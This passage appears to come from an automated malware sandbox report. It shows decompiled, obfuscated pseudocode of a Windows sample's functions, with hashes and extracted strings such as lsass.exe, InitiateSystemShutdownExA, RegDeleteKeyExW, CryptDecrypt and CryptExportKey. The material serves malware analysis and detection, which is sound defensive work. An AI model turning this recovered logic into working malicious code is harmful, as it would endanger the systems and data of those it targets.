					 *0x50923a = _t439;
					_t389 = _t386;
					_t390 =  *_t389;
					 *(_t459 - 8) = _t146;
					 *0x5091a4 = _t390;
					_t147 = _t146 - _t390;
					_t392 = _t390;
					_t442 =  !(_t439 - _t390 - 0x90d236);
					if(0x8a45 <= 0) {
						 *0x50b616 =  *0x50b616 - _t442;
						_t419 = _t419 - 0xe198;
						 *0x50bf17 = 0xbd;
						_t156 =  *0x5096f8; // 0x0
						_t147 = _t156 + 0x00000001 | 0x0000002e;
					}
					_t248 =  *0x509c8c; // 0x0
					_push(_t392);
					if((_t392 & 0x007d7b2e) <= 0) {
						 *0x50bf13 = _t147;
						_t147 = 0xd6;
					}
					_pop(_t393);
					_t395 = _t393;
					_t132 =  *(_t459 - 8);
					_t443 = _t132;
					_t399 = _t395 + _t443;
					_t350 =  *(_t459 - 0xc);
					 *(_t459 - 0x40) = _t350;
					_t251 = _t248 - _t132 - 0xf3;
					 *0x50bf17 = _t132;
					if(_t132 < 0xb19) {
						L31:
						 *0x50bf12 = _t132;
						_t252 = _t251 - _t132;
						goto L32;
					} else {
						_t252 =  *(_t459 - 8);
						 *0x50bf0c =  *0x50bf0c - _t252;
						 *0x50910a =  *0x50910a + _t252;
						if(0 <= 0) {
							L32:
							 *0x50bf15 = _t132;
							 *0x5096b4 = _t132;
							_t257 =  *0x509900; // 0x0
							_t258 = _t257 - 0x2bae;
							 *0x5090be =  *0x5090be + _t258;
							 *(_t459 - 8) = _t258;
							 *0x50bf0e =  *0x50bf0e + _t350;
							 *0x509172 = _t350;
							_push( *(_t459 - 0x40));
							if((_t399 & 0x0099410e) < 0) {
							}
							 *0x50bf17 = _t132;
							 *(_t459 - 0xc) = _t350;
							_t400 = _t399 - 0x7de7e5;
							 *0x50bf11 =  *0x50bf11 - _t400;
							 *0x509214 = _t400;
							 *0x50bf07 = _t132;
							_t352 =  *(_t459 - 0xc);
							_t401 = _t399;
							 *(_t459 - 0x44) = _t401;
							_t452 =  *0x5091ce; // 0x6d91
							_push(_t401);
							if((_t452 - 0x00009e3d & 0x0000ae02) <= 0) {
								L40:
								 *0x509152 = _t352;
								_t401 = _t352;
								goto L41;
							} else {
								if(_t132 > 0) {
									 *0x50bf15 = _t132;
								}
								if(_t132 > 0x8811c) {
									L41:
									goto L42;
								} else {
									if(0xf9 + _t132 - 0xfffffffffffffff8 != 0x31) {
										L42:
										_pop(_t405);
										_push( *(_t459 - 0x44));
										_t419 = 0xeaff;
										if(_t132 != 3) {
											 *0x509040 =  *0x509040 + _t132;
										}
										 *(_t459 - 8) = 0x34ce68;
										 *(_t459 - 0xc) = _t352;
										_t311 = 0x624c;
										 *(_t459 - 8) = _t132;
										_push(E004E881B);
										goto __ebx;
									}
									goto L40;
								}
							}
						}
						 *0x5091a2 = _t399;
						goto L31;
					}
				}
				 *0x50921e = 0;
				_t435 = 0xfffffffffffe68cf;
				 *(_t459 - 8) = _t132;
				 *(_t459 - 0xc) = _t311;
				_t314 = 0x73c4;
				_t134 =  *(_t459 - 8);
				if(0x3031ff < 0x3031ff) {
					_t314 = 0x5d28;
					 *0x50bf0f =  *0x50bf0f + 0x5d28;
					 *0x50917a = 0x5d28;
				}
				_t368 =  *0x5091ac; // 0xa184
				 *0x5091fc = _t368;
				if( *(_t459 - 0x20) != 0xffffffff) {
					 *(_t459 - 0xc) =  *(_t459 - 0xc) + _t314;
					 *(_t459 - 8) = _t134;
					 *0x50919c = 0;
					_t137 =  *(_t459 - 0x20);
					if(0 < 0) {
						L53:
						 *0x50bf17 = _t137;
					} else {
						 *0x50bf12 =  *0x50bf12 - _t137;
						 *0x509260 =  *0x509260 + _t435;
						if(_t435 >= 0) {
							goto L53;
						}
					}
					 *0x509060 =  *0x509060 + _t137;
					 *0x50bf0b =  *0x50bf0b + 0x37175f;
					 *(_t459 - 0xc) =  *(_t459 - 0xc) + 0x6cbb;
					 *0x509192 = 0x6cbb;
					_t371 = 0xffffffffffffff6a;
					 *0x5091fc =  *0x5091fc;
					 *0x509212 = 0;
					_t436 = 0;
					_t322 =  *(_t459 - 0x30);
					if(_t419 != 0) {
						L62:
						 *0x50916c = _t322;
						_t373 =  *0x50919e; // 0x70ff
						 *0x5091ea = _t373;
						_t371 = 0;
					} else {
						if(_t419 > 0) {
							L60:
							 *0x509038 =  *0x509038 - _t137;
							_t221 = 0x24b035;
							goto L61;
						} else {
							if(_t137 <= 0x159bd2) {
								if(_t137 >= 0x27dc) {
									goto L60;
								} else {
									 *0x5090e4 =  *0x5090e4 + 0x38f71d;
									 *0x50919a = 0x66f0;
									_t221 = _t137 - _t137;
									_t436 = (0 >> _t322) - 0xb83fc5;
									 *0x50bf15 = _t137;
									if(0 != 0) {
										goto L60;
									}
								}
								L61:
								 *0x5090b4 =  *0x5090b4 - _t221;
								goto L62;
							}
						}
					}
					_t374 = _t371 - 0xaef1;
					if(_t137 <=  *((intOrPtr*)(_t322 + 0x14))) {
						_t199 =  *0x50bf15; // 0x0
						 *(_t459 - 8) = _t137;
						 *0x509144 =  *0x509144 - _t322 + 0x52c6ce;
						E004AA87F( *(_t459 - 8), (_t199 - 0xf5 >> _t322) + 0x44a24a - 0x35ea, _t436);
						_t140 =  *(_t459 - 8);
						_t325 = 0;
						 *(_t459 - 8) = _t140;
						_t205 = "WSManHTTPConfig.exe";
						if(_t205 != _t205) {
							L69:
							 *0x50bf07 = _t140;
							if(_t140 <= 0xaca) {
								L73:
								 *0x509124 =  *0x509124 - _t325;
								 *0x50bf0e =  *0x50bf0e + _t325;
								_t142 =  *(_t459 - 0x1c);
								 *0x50bf12 = _t142;
								 *(_t459 - 8) = _t142;
								 *0x509ed4 =  *0x509ed4 - "RegDeleteKeyExW";
								 *0x50bf0f =  *0x50bf0f + _t325 - 0x5a45c7;
								_push(1);
								_push(0);
								_push(0x4e8fbf);
								goto __edx;
							}
							if(_t140 != 0x1b) {
								 *0x509b00 =  *0x509b00 + _t205;
							}
							goto L73;
						}
						_t205 =  *(_t459 - 0xc);
						 *0x509184 = 0xffffffffffa979b5;
						_t325 = 0 + _t374;
						_t374 =  *0x5091b6; // 0xc472
						if((_t374 & 0x00008fc7) < 0 || (_t374 & 0x008f185d) < 0) {
							_t374 = _t374 + _t436;
							_t143 =  *0x50bf13; // -9
							 *0x50bf14 = _t143;
							_t140 = 0xf2;
							goto L69;
						} else {
							goto L73;
						}
					}
					 *(_t459 - 8) = _t137;
					_push(0x7f);
					 *0x50919a = _t374;
					 *(_t459 - 0xc) = _t322;
					_t145 =  *(_t459 - 8);
					 *0x5099c8 = _t145;
					 *0x50911e = _t322 ^ 0x00000079;
					_push(E004E8E38);
					_push( *0x5098c8);
					return _t145;
				} else {
					if(0 < 0) {
						_t314 = 0x6262;
					}
					 *0x50915a = _t314;
					_push(0x7f);
					 *(_t459 - 8) = _t134;
					 *0x509db0 = 0x36c119;
					_push(0);
					_push(E004E8B54);
					_push(E004C4A3C);
					return _t134;
				}
			}































































                      0x004e829a
                      0x004e82a1
                      0x004e82ae
                      0x004e82b7
                      0x004e82d0
                      0x004e82d3
                      0x004e82e2
                      0x004e82e8
                      0x004e8303
                      0x004e8313
                      0x004e831a
                      0x004e831f
                      0x004e832a
                      0x004e8336
                      0x004e833c
                      0x004e8343
                      0x004e8349
                      0x004e8355
                      0x004e8358
                      0x004e835f
                      0x004e8365
                      0x004e8374
                      0x004e837a
                      0x004e8382
                      0x004e8385
                      0x004e838b
                      0x004e8390
                      0x004e839d
                      0x004e83a0
                      0x004e83a3
                      0x004e83af
                      0x004e83bf
                      0x004e83c7
                      0x004e83ce
                      0x004e83d6
                      0x004e83e3
                      0x004e83e8
                      0x004e83ec
                      0x004e83ec
                      0x004e83ec
                      0x004e83ff
                      0x004e8409
                      0x004e840e
                      0x004e840e
                      0x004e8420
                      0x004e8429
                      0x004e8439
                      0x004e843e
                      0x004e8441
                      0x004e8444
                      0x004e8448
                      0x004e8455
                      0x004e8456
                      0x004e845e
                      0x004e8484
                      0x004e8484
                      0x004e848b
                      0x004e8460
                      0x004e8462
                      0x004e8464
                      0x004e8464
                      0x004e8477
                      0x004e847f
                      0x004e8481
                      0x00000000
                      0x004e8481
                      0x004e847f
                      0x004e8495
                      0x004e849c
                      0x004e84ad
                      0x004e84b7
                      0x004e84bd
                      0x004e84d1
                      0x004e84da
                      0x004e84dd
                      0x004e84e0
                      0x004e84e5
                      0x004e84ee
                      0x004e84f2
                      0x004e8508
                      0x004e8510
                      0x004e8514
                      0x004e8519
                      0x004e8520
                      0x004e8526
                      0x004e8530
                      0x004e853c
                      0x004e853c
                      0x004e8544
                      0x004e854b
                      0x004e8552
                      0x004e8555
                      0x004e8558
                      0x004e8560
                      0x004e8562
                      0x004e856c
                      0x004e8572
                      0x004e8579
                      0x004e859c
                      0x004e85a2
                      0x004e85ac
                      0x004e85b3
                      0x004e85b9
                      0x004e85ba
                      0x004e85d0
                      0x004e85da
                      0x004e85e7
                      0x004e85e8
                      0x004e85ef
                      0x004e85f3
                      0x004e85fd
                      0x004e8602
                      0x004e8609
                      0x004e860f
                      0x004e860f
                      0x004e8612
                      0x004e8618
                      0x004e861f
                      0x004e862d
                      0x004e863b
                      0x004e863b
                      0x004e863d
                      0x004e8651
                      0x004e8652
                      0x004e8659
                      0x004e866f
                      0x004e8670
                      0x004e8673
                      0x004e8676
                      0x004e8679
                      0x004e8682
                      0x004e86a8
                      0x004e86b6
                      0x004e86bc
                      0x00000000
                      0x004e8684
                      0x004e868b
                      0x004e868e
                      0x004e8694
                      0x004e869f
                      0x004e86be
                      0x004e86c7
                      0x004e86db
                      0x004e86e0
                      0x004e86e6
                      0x004e86eb
                      0x004e86f2
                      0x004e86fc
                      0x004e8702
                      0x004e8713
                      0x004e8726
                      0x004e8726
                      0x004e8731
                      0x004e8738
                      0x004e8742
                      0x004e8748
                      0x004e874e
                      0x004e8771
                      0x004e8776
                      0x004e8779
                      0x004e877a
                      0x004e877d
                      0x004e8789
                      0x004e878f
                      0x004e87c1
                      0x004e87c4
                      0x004e87ce
                      0x00000000
                      0x004e8791
                      0x004e8799
                      0x004e879b
                      0x004e879b
                      0x004e87af
                      0x004e87d1
                      0x00000000
                      0x004e87b1
                      0x004e87bc
                      0x004e87dc
                      0x004e87dc
                      0x004e87dd
                      0x004e87e0
                      0x004e87e4
                      0x004e87e6
                      0x004e87e6
                      0x004e87fb
                      0x004e8800
                      0x004e8803
                      0x004e880c
                      0x004e880f
                      0x004e8819
                      0x004e8819
                      0x00000000
                      0x004e87be
                      0x004e87af
                      0x004e878f
                      0x004e86a1
                      0x00000000
                      0x004e86a1
                      0x004e8682
                      0x004e8a94
                      0x004e8a9d
                      0x004e8aa4
                      0x004e8ab2
                      0x004e8abb
                      0x004e8ac7
                      0x004e8acc
                      0x004e8ad3
                      0x004e8ad7
                      0x004e8add
                      0x004e8add
                      0x004e8ae7
                      0x004e8aee
                      0x004e8afb
                      0x004e8c67
                      0x004e8c79
                      0x004e8c8d
                      0x004e8ca5
                      0x004e8cad
                      0x004e8cc2
                      0x004e8cc2
                      0x004e8caf
                      0x004e8caf
                      0x004e8cb5
                      0x004e8cc0
                      0x00000000
                      0x00000000
                      0x004e8cc0
                      0x004e8cd4
                      0x004e8ce4
                      0x004e8cf6
                      0x004e8cf9
                      0x004e8d03
                      0x004e8d06
                      0x004e8d0d
                      0x004e8d14
                      0x004e8d17
                      0x004e8d1d
                      0x004e8da3
                      0x004e8da3
                      0x004e8dad
                      0x004e8db4
                      0x004e8dbb
                      0x004e8d23
                      0x004e8d26
                      0x004e8d85
                      0x004e8d85
                      0x004e8d92
                      0x00000000
                      0x004e8d28
                      0x004e8d33
                      0x004e8d3d
                      0x00000000
                      0x004e8d3f
                      0x004e8d47
                      0x004e8d57
                      0x004e8d6c
                      0x004e8d6e
                      0x004e8d74
                      0x004e8d7d
                      0x00000000
                      0x004e8d7f
                      0x004e8d7d
                      0x004e8d97
                      0x004e8d97
                      0x00000000
                      0x004e8da0
                      0x004e8d33
                      0x004e8d26
                      0x004e8dbd
                      0x004e8dc7
                      0x004e8ecc
                      0x004e8ed5
                      0x004e8eea
                      0x004e8efb
                      0x004e8f00
                      0x004e8f05
                      0x004e8f08
                      0x004e8f0b
                      0x004e8f12
                      0x004e8f54
                      0x004e8f54
                      0x004e8f5d
                      0x004e8f6b
                      0x004e8f70
                      0x004e8f77
                      0x004e8f83
                      0x004e8f86
                      0x004e8f8c
                      0x004e8f97
                      0x004e8fa7
                      0x004e8faf
                      0x004e8fb1
                      0x004e8fb3
                      0x004e8fbd
                      0x004e8fbd
                      0x004e8f61
                      0x004e8f63
                      0x004e8f63
                      0x00000000
                      0x004e8f61
                      0x004e8f14
                      0x004e8f1d
                      0x004e8f24
                      0x004e8f26
                      0x004e8f32
                      0x004e8f3c
                      0x004e8f3f
                      0x004e8f45
                      0x004e8f52
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004e8f32
                      0x004e8dd0
                      0x004e8dd9
                      0x004e8ddb
                      0x004e8df3
                      0x004e8dff
                      0x004e8e0f
                      0x004e8e1f
                      0x004e8e2c
                      0x004e8e31
                      0x004e8e37
                      0x004e8b01
                      0x004e8b0a
                      0x004e8b0c
                      0x004e8b0c
                      0x004e8b10
                      0x004e8b2b
                      0x004e8b30
                      0x004e8b38
                      0x004e8b47
                      0x004e8b49
                      0x004e8b4e
                      0x004e8b53
                      0x004e8b53

                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: CNBP_335.DLL$Dz<$G`}$IMCCPHR.exe$InitiateSystemShutdownExA$NtPowerInformation$OSProvider.dll$R`?$RegDeleteKeyExW$SDQ$System.Net.Primitives.dll$System.Xml.XmlDocument.dll$WSManHTTPConfig.exe$]%1$^%.$normaliz.dll$ucmhc.dll$F
                      • API String ID: 0-2272826359
                      • Opcode ID: bdb1da670e0fa0c0739ec1282394688ee78361344f1acaddfe6a516f6012855f
                      • Instruction ID: dc5b59073ecc3be7054bf4352d6e77e3895222791f7adda92deaf7d2b7672475
                      • Opcode Fuzzy Hash: bdb1da670e0fa0c0739ec1282394688ee78361344f1acaddfe6a516f6012855f
                      • Instruction Fuzzy Hash: 6E32F175E043869FCB00DFB9EC986CD7BB1EB79320B08856EC85897366D3380949EB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004B6ECB Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 263encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptExportKey.ADVAPI32(?,?,00000006), ref: 004B7071
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CryptExport
                      • String ID: CoLockObjectExternal$G.V$InitiateSystemShutdownExA$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$System.Xml.XmlDocument.dll$WFServicesReg.exe$WSManHTTPConfig.exe$activeds.dll$dpnet.dll$lsass.exe$networkitemfactory.dll$ucmhc.dll
                      • API String ID: 3389274496-1735128682
                      • Opcode ID: 9300edce1c6eaca630131e32320873dc04e76a50b5040fb8c82b62c68c755605
                      • Instruction ID: 49f11683c70a56330a9b0513da23aa4333476cfe196987f9c1bb4bbcbd2c33fa
                      • Opcode Fuzzy Hash: 9300edce1c6eaca630131e32320873dc04e76a50b5040fb8c82b62c68c755605
                      • Instruction Fuzzy Hash: 4FA19B75F443069BDB00DFB9E8D86CE7BB0FB39320F44406AD844A7366E2780A49DB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004B3784 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 207encryptionCOMMONCrypto
                      Download Yara Rule
                      C-Code - Quality: 15%
                      			E004B3784(void* __ecx, void* __edx, signed int __edi, unsigned short __esi) {
				int _t37;
				int _t45;
				int _t60;
				intOrPtr _t105;
				void* _t107;
				void* _t120;
				signed char _t123;
				intOrPtr _t125;
				short _t127;
				void* _t128;
				signed int _t129;
				unsigned short _t132;
				unsigned short _t133;
				unsigned short _t134;
				void* _t137;

				_t132 = __esi;
				_t129 = __edi;
				_t107 = __edx;
				_t37 =  *(_t137 - 8);
				if(_t37 <= 0x19509d) {
					 *((intOrPtr*)(_t137 - 0x14)) =  *((intOrPtr*)(_t137 - 0x14)) - 0x2e8764;
					 *((intOrPtr*)(_t137 - 0x14)) =  *((intOrPtr*)(_t137 - 0x14)) - 0x2e8764;
				}
				 *(_t137 - 8) = _t37;
				_push( *((intOrPtr*)(_t137 - 0x4c)));
				 *0x5091cc = _t107 - 1;
				if("lsass.exe" <= 0x24225c) {
					 *0x5090e6 =  *0x5090e6 - 0x395923;
					 *0x509100 =  *0x509100 - 0x395923;
				}
				_t45 = CryptDecrypt();
				_t133 = _t132 >> 0x7722;
				if(_t45 < 0) {
					_t129 = _t129 >> 0x7722;
					if(0x5090b8 > 0x5090b8) {
					}
				}
				_t102 = 0x7156;
				 *((intOrPtr*)(_t137 - 0x24)) =  *((intOrPtr*)(_t137 - 0x24)) - 0x7156;
				 *0x5091a2 =  *0x5091a2;
				 *0x50bf12 =  *0x50bf12 - _t45;
				 *0x50ace0 =  *0x50ace0 + _t133;
				_t68 = 0xd3;
				 *0x50ba1b =  *0x50ba1b - _t129;
				if(_t45 != 0) {
					 *(_t137 - 8) = _t45;
					if(_t45 <= 0x21bf76) {
						 *0x50bf0b =  *0x50bf0b - 0xd3;
						 *0x5090de =  *0x5090de + 0xd3;
						_t68 = 0x1a6;
						_t102 =  *0x50912e; // 0x9c03
						if(_t102 < _t102) {
							 *0x50bf0f =  *0x50bf0f + _t102;
						}
						 *0x509192 = _t102;
					}
					_t123 = 0x9402;
					 *0x5091fc =  *0x5091fc + 0x9402;
					 *0x509212 =  *0x509212 - 0x9402;
					_t134 = _t133 + 0xbb6e;
					_t129 = _t129 >> _t102;
					_t60 =  *(_t137 + 0xc);
					if(_t129 != 0) {
						L16:
						_t102 = _t102 + _t102;
						if((_t123 & 0x00000081) <= 0) {
							L18:
							_t129 = _t129 + _t129 + 0xe5fd;
							 *0x50bf17 = _t60;
							_t68 = 0;
							goto L19;
						}
						 *0x5091ea = _t123;
						_t123 =  *0x50923a; // 0x9678
						_t68 = 0xba;
						if(_t134 == 0) {
							goto L21;
						}
						goto L18;
					} else {
						_t129 = _t129 | 0x00000157;
						if(_t60 >= 0x11) {
							L19:
							 *(_t137 - 0xc) =  *(_t137 - 0xc) - _t60;
							 *(_t137 - 0xc) = _t60;
							_t68 = 0xffffffffffbe3805;
							if(0xffffffffffbe3805 > 0xffffffffffbe3805) {
								L22:
								_t125 =  *((intOrPtr*)(_t137 - 0x54));
								 *(_t137 - 8) = _t60;
								_t61 = 0x204c6f;
								 *(_t137 - 0xc) = _t68;
								if(_t68 != 0x3c) {
									_t68 = 0x43a7ba;
									 *0x50910c =  *0x50910c + 0x43a7ba;
									 *0x509128 = _t102;
									_t105 =  *0x509176; // 0x6328
									_t102 = _t105 - 0x7abd;
									_t134 = (_t134 >> _t105 - 0x7abd) + _t125 - 0xa229;
									_t61 = 0x204bc2;
								}
								 *0x50bf11 =  *0x50bf11 - _t125 - 0x7d29ab;
								_t127 = _t125;
								_t133 = _t134;
								 *0x5091e0 = _t127;
								_t128 = _t127;
								_t45 = _t61;
								_push(_t128);
								_push(_t128);
								_push(_t128);
								_push(E004B39E7);
								goto __edx;
							}
							 *0x509122 = _t102;
							_t102 = 0x78a6;
							L21:
							_t102 =  !_t102;
							 *0x5091b6 = _t123;
							goto L22;
						}
						 *0x50bf0e =  *0x50bf0e - _t102;
						 *0x509152 =  *0x509152 + _t102;
						goto L16;
					}
				}
				_push(0xa0a5);
				 *(_t137 - 8) = _t45;
				 *0x50bf0a =  *0x50bf0a - 0x1d6660;
				E004AE40E(L00468BBD(0x1d6660, 0xa97a), 0x4df650, 0x7156, 0xa97a, _t129, _t133, 0);
				 *0x50911c = 0x7156;
				 *0x50a5f0 =  *0x50a5f0 - 0xa97a;
				_t120 = 0x4df650;
				_push( *((intOrPtr*)(_t137 - 0x4c)));
				_push(_t120);
				_push(E004B3AC3);
				_push( *0x509e54);
				return  *(_t137 - 8);
			}


















                      0x004b3784
                      0x004b3784
                      0x004b3784
                      0x004b3784
                      0x004b3791
                      0x004b379b
                      0x004b379e
                      0x004b379e
                      0x004b37a1
                      0x004b37be
                      0x004b37cd
                      0x004b37e1
                      0x004b37eb
                      0x004b37f2
                      0x004b37f2
                      0x004b380a
                      0x004b3812
                      0x004b3817
                      0x004b381d
                      0x004b383a
                      0x004b383a
                      0x004b383a
                      0x004b3844
                      0x004b3848
                      0x004b384b
                      0x004b385d
                      0x004b3863
                      0x004b3871
                      0x004b3873
                      0x004b387c
                      0x004b3882
                      0x004b388a
                      0x004b388c
                      0x004b3892
                      0x004b3899
                      0x004b389b
                      0x004b38a4
                      0x004b38a6
                      0x004b38a6
                      0x004b38ac
                      0x004b38ac
                      0x004b38b6
                      0x004b38ba
                      0x004b38c1
                      0x004b38ca
                      0x004b38d4
                      0x004b38e1
                      0x004b38e7
                      0x004b390f
                      0x004b390f
                      0x004b3914
                      0x004b392e
                      0x004b3932
                      0x004b3937
                      0x004b393c
                      0x00000000
                      0x004b393c
                      0x004b3916
                      0x004b3920
                      0x004b3927
                      0x004b392c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004b38e9
                      0x004b38e9
                      0x004b38f1
                      0x004b393e
                      0x004b3943
                      0x004b3946
                      0x004b394d
                      0x004b3956
                      0x004b396f
                      0x004b3976
                      0x004b3979
                      0x004b397c
                      0x004b3981
                      0x004b3987
                      0x004b3989
                      0x004b398e
                      0x004b3995
                      0x004b399f
                      0x004b39a6
                      0x004b39b0
                      0x004b39b5
                      0x004b39b5
                      0x004b39bf
                      0x004b39c5
                      0x004b39c6
                      0x004b39cb
                      0x004b39d5
                      0x004b39d6
                      0x004b39d8
                      0x004b39d9
                      0x004b39da
                      0x004b39db
                      0x004b39e5
                      0x004b39e5
                      0x004b3958
                      0x004b3962
                      0x004b3966
                      0x004b3966
                      0x004b3968
                      0x00000000
                      0x004b3968
                      0x004b3902
                      0x004b3908
                      0x00000000
                      0x004b3908
                      0x004b38e7
                      0x004b3a3e
                      0x004b3a4b
                      0x004b3a62
                      0x004b3a70
                      0x004b3a7e
                      0x004b3a8d
                      0x004b3a9a
                      0x004b3a9b
                      0x004b3aa0
                      0x004b3ab7
                      0x004b3abc
                      0x004b3ac2

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CryptDecrypt
                      • String ID: #Y9$CNBP_335.DLL$G.V$G`}$InitiateSystemShutdownExA$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$lsass.exe$oL
                      • API String ID: 2620231605-704947606
                      • Opcode ID: 6434e06d8e2f77a5c8e9e61d83859d8f0ce36a643290fb73e34a3d9c6789f362
                      • Instruction ID: b4209656af4d54c3d9107a49bb6476fbf9b0fe48bea1afd19b879d6c667ccbf1
                      • Opcode Fuzzy Hash: 6434e06d8e2f77a5c8e9e61d83859d8f0ce36a643290fb73e34a3d9c6789f362
                      • Instruction Fuzzy Hash: F17123B5A003069BDB00DF7AEC996CD7BB1FB79710B08842AD844E3726E3780A49DB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004B74F7 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 232encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptExportKey.ADVAPI32(?,?,00000006), ref: 004B766A
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CryptExport
                      • String ID: CNBP_335.DLL$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$OSProvider.dll$TpCaptureCaller$dpnet.dll$mscpxl32.dLL$ucmhc.dll
                      • API String ID: 3389274496-2979050597
                      • Opcode ID: b1443d7df1f858678b58b9b46ba6ac197c3bb39f4cc6b54cf82becf211e7e70a
                      • Instruction ID: 6886079a854f876adbd4c64abd0be54fa4248196f95f431457090f5f8f0370e2
                      • Opcode Fuzzy Hash: b1443d7df1f858678b58b9b46ba6ac197c3bb39f4cc6b54cf82becf211e7e70a
                      • Instruction Fuzzy Hash: EB81C179F047069FDB00DF79D8882DDBBB0FB79320B04426AD919A7366E3780949DB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004AE5BE Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 179encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptBinaryToStringA.CRYPT32(?,?,000000F9,00000001,00000005), ref: 004AE87B
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID: CNBP_335.DLL$IMCCPHR.exe$InitiateSystemShutdownExA$NtSetDriverEntryOrder$WSManHTTPConfig.exe$aaclient.dll$api-ms-win-core-localization-l1-1-0.dll
                      • API String ID: 80407269-1064507877
                      • Opcode ID: beca1dc9563e04e00d3e033c5248c1603fedfa57e486cb6f9ffce0518a3d04e2
                      • Instruction ID: 30d49ceb3d958b7dda6f694fb9283b2203df418664f1ff30a4c02545ae22b7ba
                      • Opcode Fuzzy Hash: beca1dc9563e04e00d3e033c5248c1603fedfa57e486cb6f9ffce0518a3d04e2
                      • Instruction Fuzzy Hash: D0517B7AA143434BD700EF79ED992CE3BB1EB36320B44492ADC50D7767E328450ADB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004B6481 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 152encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptExportKey.ADVAPI32(?,951A17BA,00000007,00000000,00000000), ref: 004B6650
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CryptExport
                      • String ID: CNBP_335.DLL$G.V$G`}$HMETAFILEPICT_UserSize$NtSetDriverEntryOrder$lsass.exe$mscpxl32.dLL
                      • API String ID: 3389274496-1499778608
                      • Opcode ID: ab59ec86f3bf80186bc6f0937e7e324a2b1a3822996b58765c4cd5be6d63eaa3
                      • Instruction ID: e32ce7c38ba0493268d5b62a4cfcce870fcd447c92f23e19ee35de79477fa7bd
                      • Opcode Fuzzy Hash: ab59ec86f3bf80186bc6f0937e7e324a2b1a3822996b58765c4cd5be6d63eaa3
                      • Instruction Fuzzy Hash: 9A51E071F042069BDB00EFB9EC982CE7BB1EB39310F49857A9844D7756E2790A48DB40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0046A04E Relevance: 14.0, Strings: 11, Instructions: 234COMMON
                      Download Yara Rule
                      C-Code - Quality: 34%
                      			E0046A04E(intOrPtr __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				char _t54;
				intOrPtr _t69;
				intOrPtr _t88;
				intOrPtr _t92;
				char* _t98;
				unsigned short _t113;
				intOrPtr _t118;
				void* _t142;
				signed char _t148;
				void* _t153;
				short _t157;
				intOrPtr _t161;
				short _t163;
				void* _t167;
				void* _t169;
				void* _t177;

				_t167 = __edi;
				 *((intOrPtr*)(_t177 - 8)) = __eax;
				 *0x50912c = __ecx - 0x588823;
				_t98 = 0x370c96;
				_t54 =  *((intOrPtr*)(_t177 - 8));
				 *0x5090fa =  *0x5090fa - 0x370c96;
				_t142 = 0xffffffffffacaa61;
				_push(0);
				_t157 = 0xacce;
				 *0x50bf13 = _t54;
				if(_t54 == 0) {
					L2:
					_t142 = 0x6ec6;
					if(0x6ec6 == 0x6ec6) {
						_t157 = 0xa1;
						 *0x50bf12 =  *0x50bf12 - 0xa1;
						_t98 =  *0x50bf14; // 0x0
					}
					L4:
					 *0x50bf15 = _t54;
					_push( *0x50901a);
					 *0x50bf17 = _t54;
					_t169 = _t167 - 0xedf8 + _t54;
					if(_t54 < 0x105e86) {
						if(_t54 < 0x1a22) {
							 *(_t177 - 0x10) = _t98;
						}
